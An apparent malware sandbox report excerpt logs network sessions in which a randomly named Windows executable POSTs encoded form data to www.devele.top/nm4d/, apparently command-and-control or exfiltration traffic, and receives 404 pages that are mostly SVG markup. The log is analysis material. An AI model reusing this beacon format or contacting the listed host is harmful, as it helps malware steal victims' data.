                                                      Jul 3, 2024 17:45:18.656177998 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                      Jul 3, 2024 17:45:18.656192064 CEST448INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                      Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                      Jul 3, 2024 17:45:18.656399012 CEST1236INData Raw: 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30 37 22 20 79 32 3d 22 32 36 36 2e 35 38 31 22
                                                      Data Ascii: erlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="508.129" y1="255
                                                      Jul 3, 2024 17:45:18.656415939 CEST1236INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 30 30 2e 36 37 22 20 79 31 3d 22
                                                      Data Ascii: stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                      Jul 3, 2024 17:45:18.656429052 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                      Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <line fill="none"
                                                      Jul 3, 2024 17:45:18.656444073 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                                      Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                                      Jul 3, 2024 17:45:18.656749964 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                                      Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                                      Jul 3, 2024 17:45:18.656765938 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                                      Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                                      Jul 3, 2024 17:45:18.656986952 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                      Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                      Jul 3, 2024 17:45:18.661653996 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                      Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.449752162.0.213.72803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:20.577549934 CEST696OUTPOST /nm4d/ HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.devele.top
                                                      Referer: http://www.devele.top/nm4d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 43 38 79 61 59 6b 30 71 35 49 4f 44 76 31 37 42 73 52 45 33 4d 32 62 72 36 46 4a 4a 53 32 43 52 70 61 47 37 4a 4b 53 62 65 4e 58 5a 35 58 31 30 35 76 63 79 6c 4c 67 69 47 73 6f 52 45 56 7a 6c 35 58 33 66 4e 62 48 30 48 70 32 4e 34 51 51 44 77 53 4f 54 38 7a 37 56 6e 61 46 6b 59 68 64 31 4b 39 50 65 54 5a 66 4c 4a 57 55 61 62 45 65 52 50 46 7a 6e 77 76 75 43 35 54 48 41 38 6e 63 57 39 6c 51 4e 70 4b 6e 38 77 4c 61 66 43 42 7a 42 49 56 71 4b 58 38 43 4f 48 70 53 78 57 2b 5a 73 50 4d 6c 49 34 6e 35 4d 50 49 4c 77 44 4a 4b 50 34 52 4c 55 6d 4a 51 74 4d 50 79 45 72 34 4a 30 78 70 30 72 59 36 52 34 6e 33 6b 6b 47 74 7a 4b 36 59 4f 65 4f 73 55 3d
                                                      Data Ascii: lxRlvTSh=C8yaYk0q5IODv17BsRE3M2br6FJJS2CRpaG7JKSbeNXZ5X105vcylLgiGsoREVzl5X3fNbH0Hp2N4QQDwSOT8z7VnaFkYhd1K9PeTZfLJWUabEeRPFznwvuC5THA8ncW9lQNpKn8wLafCBzBIVqKX8COHpSxW+ZsPMlI4n5MPILwDJKP4RLUmJQtMPyEr4J0xp0rY6R4n3kkGtzK6YOeOsU=
                                                      Jul 3, 2024 17:45:21.199917078 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:21 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                      Jul 3, 2024 17:45:21.199938059 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                      Jul 3, 2024 17:45:21.199949980 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                      Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                      Jul 3, 2024 17:45:21.200058937 CEST672INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                                      Jul 3, 2024 17:45:21.200072050 CEST1236INData Raw: 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33 22 20 79 32 3d 22 34 39 33 2e 37 31 33 22 20
                                                      Data Ascii: limit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0620" stroke-wid
                                                      Jul 3, 2024 17:45:21.200130939 CEST1236INData Raw: 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b
                                                      Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fil
                                                      Jul 3, 2024 17:45:21.200141907 CEST1236INData Raw: 36 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: 6" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g>
                                                      Jul 3, 2024 17:45:21.200153112 CEST672INData Raw: 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 33 33 2e 33 34 33 22 20 63 79 3d 22 34 37 37 2e 30 31 34 22 20 72 3d 22
                                                      Data Ascii: cap="round" stroke-miterlimit="10" cx="133.343" cy="477.014" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy=
                                                      Jul 3, 2024 17:45:21.200205088 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                      Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                      Jul 3, 2024 17:45:21.200218916 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                      Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                                                      Jul 3, 2024 17:45:21.205112934 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                                                      Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.449753162.0.213.72803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:23.115803957 CEST10778OUTPOST /nm4d/ HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.devele.top
                                                      Referer: http://www.devele.top/nm4d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 43 38 79 61 59 6b 30 71 35 49 4f 44 76 31 37 42 73 52 45 33 4d 32 62 72 36 46 4a 4a 53 32 43 52 70 61 47 37 4a 4b 53 62 65 4e 66 5a 35 6b 4e 30 37 4f 63 79 6b 4c 67 69 4d 4d 6f 51 45 56 7a 64 35 58 2f 54 4e 62 4b 4a 48 72 4f 4e 35 31 45 44 32 6d 61 54 70 44 37 56 6c 61 46 6e 58 42 64 67 4b 39 66 61 54 5a 50 4c 4a 57 55 61 62 47 47 52 59 45 7a 6e 79 76 75 4e 38 6a 48 63 34 6e 64 2f 39 6c 34 37 70 4a 4b 42 7a 37 36 66 43 68 6a 42 4b 6e 43 4b 4c 73 43 4d 54 4a 53 70 57 2b 56 7a 50 4d 34 6b 34 6d 4e 6d 50 4c 58 77 44 76 4c 50 72 67 33 30 30 66 51 67 53 6f 43 67 6a 37 6c 4d 77 75 67 68 49 4a 31 47 36 55 73 34 64 66 65 39 6a 63 7a 62 56 62 47 6c 37 39 34 63 36 41 30 68 66 2f 43 78 49 65 47 2b 45 63 4f 78 72 33 31 2b 52 44 4b 61 32 30 6d 71 4e 62 68 39 52 71 78 45 67 75 61 41 50 70 6e 46 78 30 6f 54 35 76 48 37 76 46 77 52 6c 63 4d 66 48 59 59 58 65 68 61 6f 50 6b 75 4f 38 75 74 42 5a 59 68 75 42 51 70 68 52 4c 47 59 5a 6f 67 56 4a 53 56 4d 42 44 62 43 54 44 72 67 51 4b 2f 38 67 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=C8yaYk0q5IODv17BsRE3M2br6FJJS2CRpaG7JKSbeNfZ5kN07OcykLgiMMoQEVzd5X/TNbKJHrON51ED2maTpD7VlaFnXBdgK9faTZPLJWUabGGRYEznyvuN8jHc4nd/9l47pJKBz76fChjBKnCKLsCMTJSpW+VzPM4k4mNmPLXwDvLPrg300fQgSoCgj7lMwughIJ1G6Us4dfe9jczbVbGl794c6A0hf/CxIeG+EcOxr31+RDKa20mqNbh9RqxEguaAPpnFx0oT5vH7vFwRlcMfHYYXehaoPkuO8utBZYhuBQphRLGYZogVJSVMBDbCTDrgQK/8gDhdLE5hF4Zw42GkAECIyPfc1g+duljU6M2eZy34OLeSa7yMFNUZDP0RMQVA9quB1vFpZUjzpXR5ccVcozI3GDKz2evmpvzCul96wRF0jTEHNmz5CWSqcIBoOLL0t1nPi/4vt1F4BjFhduue7FSdqvkE94MMJlp8nIACWsMghA4KXElrXmmenFfgDxFssDJqq+oVzPJZclJ3vA8zdbrzu6LKftjDuJqC+V3SdFkzrB46Bl+FZe3H3rKvTD3HXS1IUVoGRvu46QxEYHDkA2f6VOOvAE8aD3rf3Q5y1YENAhOFz5YxE4HLTg3D50a+TLEKcyMOKVkDCKoEL1xNw5TXZ2kXPvSA0qiATONmklMqfOaUYV/78Y6hmsx/2PkMn2zHkHk8Hd8t3/bt7P5o2enR84+ItNIZLyEsjFKi7YK+Q59EC8Yl1Tya8HPX7lXUlyKzM44ueFtq4PnrPx66I9VDcadOfwzV0p52xSPC1rKtjOzLO/ujj4hID1T/Y4PTR4cHP06ZRrZ07iRFC8Jcy35mu5clF+fhHGrWlMHX++bBwGejK4tv41t2CN6PYnYNa5dV5HCHuH8pxUOkfcQQ87LP+ffVM0zm0cfD77jc4Pg6AF1YT8DfZ1iA3Ve2SGuxJ7m3p7FCiL4d7VNzPwYbcqbteatzxVtNypH4nfw [TRUNCATED]
                                                      Jul 3, 2024 17:45:23.720333099 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:23 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                      Jul 3, 2024 17:45:23.720387936 CEST224INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705
                                                      Jul 3, 2024 17:45:23.720397949 CEST1236INData Raw: 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22
                                                      Data Ascii: ,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"> <circle fil
                                                      Jul 3, 2024 17:45:23.720411062 CEST1236INData Raw: 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: 8-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                      Jul 3, 2024 17:45:23.720432997 CEST1236INData Raw: 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20 79 31 3d 22 31 34 33 2e 33 34 39 22
                                                      Data Ascii: necap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="rou
                                                      Jul 3, 2024 17:45:23.720443964 CEST1236INData Raw: 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                                                      Data Ascii: 4" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g> <g>
                                                      Jul 3, 2024 17:45:23.720570087 CEST896INData Raw: 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74
                                                      Data Ascii: y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146" />
